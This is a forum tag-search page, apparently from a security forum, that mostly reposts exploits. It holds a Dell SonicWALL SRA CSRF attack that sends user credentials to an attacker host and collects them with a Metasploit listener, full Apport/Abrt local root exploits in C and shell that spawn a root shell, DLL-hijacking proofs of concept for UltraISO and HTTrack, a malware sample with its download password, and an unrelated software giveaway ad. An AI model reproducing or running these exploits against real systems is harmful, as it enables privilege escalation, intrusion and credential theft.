Search the Community
Showing results for tags 'create'.
-
The virus on VT: https://www.virustotal.com/en/file/8f35f6f780acccfb406b918db6ef01111dd2c5200a16e97f25d35f76e2532e6d/analysis/1432362743/ The virus inject many process like it: but I cann't found how it autostart. When OS restarted, it start itself via explorer.exe, but I do not know how it auto started. log: 2015/05/23 15:54:55 c:\windows\explorer.exe Create new process c:\users\test\appdata\roaming\mozilla\firefox\profiles\4ude5xz7.default\storage\permanent\xulstore.exe?Cmd line: "C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\4ude5xz7.default\storage\permanent\xulstore.exe" Download Pass: infected Source
-
- 2015/05/23
- create
-
(and 3 more)
Tagged with:
-
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery # Date: 04/28/2015 # Vendor Homepage: www.dell.com # Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv # CVE : 2015-2248 Exploitation Procedure (Outline): 1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker. 2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay. 3. Gather the credentials on the target server provided in step #1 1. Create a bookmark: <html> <body> <form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST"> <input type="hidden" name="bmName" value="foo" /> <input type="hidden" name="host" value="www.malicious-host.tld" /> <input type="hidden" name="description" value="bar" /> <input type="hidden" name="tabs" value="Baz" /> <input type="hidden" name="service" value="HTTP" /> <input type="hidden" name="fbaSSOEnabled" value="on" /> <input type="hidden" name="fbaSSOFormUserName" value="user" /> <input type="hidden" name="fbaSSOFormUserPassword" value="password" /> <input type="hidden" name="MC_App" value="inherit" /> <input type="hidden" name="MC_Copy" value="inherit" /> <input type="hidden" name="MC_Print" value="inherit" /> <input type="hidden" name="MC_Offline" value="inherit" /> <input type="hidden" name="name" value="name" /> <input type="hidden" name="type" value="type" /> <input type="hidden" name="owner" value="owner" /> <input type="hidden" name="cmd" value="add" /> <input type="hidden" name="wantBmData" value="true" /> <input type="hidden" name="ok" value="OK" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Call the newly created bookmark This might require some guesswork, because we don't know which value bookmarkAccessed needs to have. <html> <body> <form action="https://vulnerable.vpn-installation.tld/cgi-bin/http"> <input type="hidden" name="HOST" value="www.malicious-host.tld" /> <input type="hidden" name="bookmarkAccessed" value="4" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3. Set up a listener E.g. metasploit payload use auxiliary/server/capture/http_basic msf auxiliary(http_basic) > [*] Listening on 0.0.0.0:80... [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://www.malicious-host.tld:80/ [*] Server started. [*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld [+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password" Surs?: http://dl.packetstormsecurity.net/1505-exploits/dellsonicwallsra-xsrf.txt
-
[CVE-2015-1318,CVE-2015-1862] Apport/Abrt Local Root Exploit #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <elf.h> #include <err.h> #include <syslog.h> #include <sched.h> #include <linux/sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/auxv.h> #include <sys/wait.h> # warning this file must be compiled with -static // // Apport/Abrt Vulnerability Demo Exploit. // // Apport: CVE-2015-1318 // Abrt: CVE-2015-1862 // // -- taviso@cmpxchg8b.com, April 2015. // // $ gcc -static newpid.c // $ ./a.out // uid=0(root) gid=0(root) groups=0(root) // sh-4.3# exit // exit // // Hint: To get libc.a, // yum install glibc-static or apt-get install libc6-dev // int main(int argc, char **argv) { int status; Elf32_Phdr *hdr; pid_t wrapper; pid_t init; pid_t subprocess; unsigned i; // Verify this is a static executable by checking the program headers for a // dynamic segment. Originally I thought just checking AT_BASE would work, // but that isnt reliable across many kernels. hdr = (void *) getauxval(AT_PHDR); // If we find any PT_DYNAMIC, then this is probably not a static binary. for (i = 0; i < getauxval(AT_PHNUM); i++) { if (hdr[i].p_type == PT_DYNAMIC) { errx(EXIT_FAILURE, "you *must* compile with -static"); } } // If execution reached here, it looks like we're a static executable. If // I'm root, then we've convinced the core handler to run us, so create a // setuid root executable that can be used outside the chroot. if (getuid() == 0) { if (chown("sh", 0, 0) != 0) exit(EXIT_FAILURE); if (chmod("sh", 04755) != 0) exit(EXIT_FAILURE); return EXIT_SUCCESS; } // If I'm not root, but euid is 0, then the exploit worked and we can spawn // a shell and cleanup. if (setuid(0) == 0) { system("id"); system("rm -rf exploit"); execlp("sh", "sh", NULL); // Something went wrong. err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked"); } // It looks like the exploit hasn't run yet, so create a chroot. if (mkdir("exploit", 0755) != 0 || mkdir("exploit/usr", 0755) != 0 || mkdir("exploit/usr/share", 0755) != 0 || mkdir("exploit/usr/share/apport", 0755) != 0 || mkdir("exploit/usr/libexec", 0755) != 0) { err(EXIT_FAILURE, "failed to create chroot directory"); } // Create links to the exploit locations we need. if (link(*argv, "exploit/sh") != 0 || link(*argv, "exploit/usr/share/apport/apport") != 0 // Ubuntu || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) { // Fedora err(EXIT_FAILURE, "failed to create required hard links"); } // Create a subprocess so we don't enter the new namespace. if ((wrapper = fork()) == 0) { // In the child process, create a new pid and user ns. The pid // namespace is only needed on Ubuntu, because they check for %P != %p // in their core handler. On Fedora, just a user ns is sufficient. if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0) err(EXIT_FAILURE, "failed to create new namespace"); // Create a process in the new namespace. if ((init = fork()) == 0) { // Init (pid 1) signal handling is special, so make a subprocess to // handle the traps. if ((subprocess = fork()) == 0) { // Change /proc/self/root, which we can do as we're privileged // within the new namepace. if (chroot("exploit") != 0) { err(EXIT_FAILURE, "chroot didnt work"); } // Now trap to get the core handler invoked. __builtin_trap(); // Shouldn't happen, unless user is ptracing us or something. err(EXIT_FAILURE, "coredump failed, were you ptracing?"); } // If the subprocess exited with an abnormal signal, then everything worked. if (waitpid(subprocess, &status, 0) == subprocess) return WIFSIGNALED(status) ? EXIT_SUCCESS : EXIT_FAILURE; // Something didn't work. return EXIT_FAILURE; } // The new namespace didn't work. if (waitpid(init, &status, 0) == init) return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS ? EXIT_SUCCESS : EXIT_FAILURE; // Waitpid failure. return EXIT_FAILURE; } // If the subprocess returned sccess, the exploit probably worked, reload // with euid zero. if (waitpid(wrapper, &status, 0) == wrapper) { // All done, spawn root shell. if (WIFEXITED(status) && WEXITSTATUS(status) == 0) { execl(*argv, "w00t", NULL); } } // Unknown error. errx(EXIT_FAILURE, "unexpected result, cannot continue"); } Apport - Local Linux Root #!/bin/sh # # CVE-2015-1318 # # Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758 # # Example: # # % uname -a # Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux # # % lsb_release -a # No LSB modules are available. # Distributor ID: Ubuntu # Description: Ubuntu 14.04.2 LTS # Release: 14.04 # Codename: trusty # # % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 " " $3 }' # apport 2.14.1-0ubuntu3.8 # # % id # uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...) # # % ./apport.sh # pwned-4.3# id # uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...) # pwned-4.3# exit TEMPDIR=$(mktemp -d) cd ${TEMPDIR} cp /bin/busybox . mkdir -p dev mnt usr/share/apport ( cat << EOF #!/busybox sh ( cp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned chmod 5755 /mnt/1/root/tmp/pwned ) EOF ) > usr/share/apport/apport chmod +x usr/share/apport/apport ( cat << EOF mount -o bind . . cd . mount --rbind /proc mnt touch dev/null pivot_root . . ./busybox sleep 500 & SLEEP=\$! ./busybox sleep 1 ./busybox kill -11 \$SLEEP ./busybox sleep 5 EOF ) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \ lxc-unshare -s "MOUNT|PID|NETWORK|UTSNAME|IPC" -- /bin/sh 2>&1 >/dev/null /tmp/pwned -p rm -Rf ${TEMPDIR}
-
#[+] Author: TUNISIAN CYBER #[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Poc:http://i.imgur.com/naHAdJF.png #[+] Create Compile the file then rename it to daemon.dll then create .iso file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source
-
#[+] Author: TUNISIAN CYBER #[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Vendor: https://httrack.com/page/2/fr/index.html #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source: http://dl.packetstormsecurity.net/1503-exploits/httrackwebsitecopier-dllhijack.txt Edit: Cer ca postul s? fie ?ters , originally posted by Aerosol: https://rstforums.com/forum/99633-httrack-website-copier-3-48-21-dll-hijacking.rst
-
#[+] Author: TUNISIAN CYBER #[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Vendor: https://httrack.com/page/2/fr/index.html #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source
-
Product Description Liquid Story Binder XE is a uniquely designed word processor for professional and aspiring authors, poets, and novelists. Writing software for those who require the editing ability of a commercial text editor as well as a document tracking system. It is for those who want the freedom to create, outline and revise but are tired of losing track of their work Word Processing for Novelists Liquid Story Binder XE is specifically designed for fiction writing. XE includes all the standard features such as spell-checking, thesaurus, smart quotes, templates, font and paragraph styles — everything you need to write your next great novel. Chapter and Scene Based Writing Liquid Story Binder XE can clean and combine many small documents into a single, font-unified manuscript. Use a Chapter Builder to quickly arrange complex scenes. A Multimedia Organizer Sort pictures into Galleries or Storyboards, quickly access custom MP3 playlists, even record yourself reading your latest chapter using a microphone. Pick and Choose Flexible Features Pick and choose the file types that work best for you. Liquid Story Binder never tells you how to write! Flexible file types allow you to use your imagination. Use a Dossier for characters, places or things, or a Builder to preserve important snippets. Organize Your Novel Create a Binder folder and let Liquid Story Binder sort, search and combine your documents. Create the Perfect Working Environment Choose a color scheme that suits your writing style. Save window positions and open files for quick and easy access using Workspaces. Open dozens of windows simultaneously – or just a simple textbox centered in the screen. Full Screen Editing Even though Liquid Story Binder is packed with features, sometimes less is more. Liquid Story Binder XE offers full screen editing, a feature that removes all distractions including menus and title bars. A Typewriter for your PC The Liquid Story Binder Typewriter is the ultimate tool for distraction-free writing. Like a mechanical typewriter, users are prevented from editing previously written text. There are no specific formatting options, no scrolling, deleting, or revisions. The Typewriter tool doesn’t even allow you to use the backspace key. It forces you to write, to move forward, to add new words. It halts the temptation to linger, revise, and correct. Turn Liquid Story Binder into a typewriter for your PC. Advanced Outlining Tools Timelines, Outlines, Mindmaps, Dossiers, Sequences and Storyboards. Liquid Story Binder XE provides the tools you need to plan your next great novel. Mindmapping Liquid Story Binder XE Mindmaps allow you to visually link ideas together using lines and text. A mindmap is a diagram used to represent words, ideas, tasks, or other items linked to and arranged around a central key word or idea. Unlike many mindmapping applications, Liquid Story Binder XE does not use a rigid or pre-designed structure. Users can place items however they choose. Create item colonies, isolated from one another. Index items by color. Change item connections quickly and easily. Try using Mindmaps to create and organize family trees. Journals Liquid Story Binder XE allows you to create multiple Journals. Start a daily writing journal, or go back into the past to tell the story of a fictional character. Combine your Journal entries into a single manuscript. Protect Your Work For every Chapter, Liquid Story Binder XE creates a single, easy-to-access backup file. This backup file contains an entry for each day’s changes. Liquid Story Binder XE also includes a complete Binder backup using ZIP compression. Product homepage here -> Download <-Deal Expires in: EXPIRED!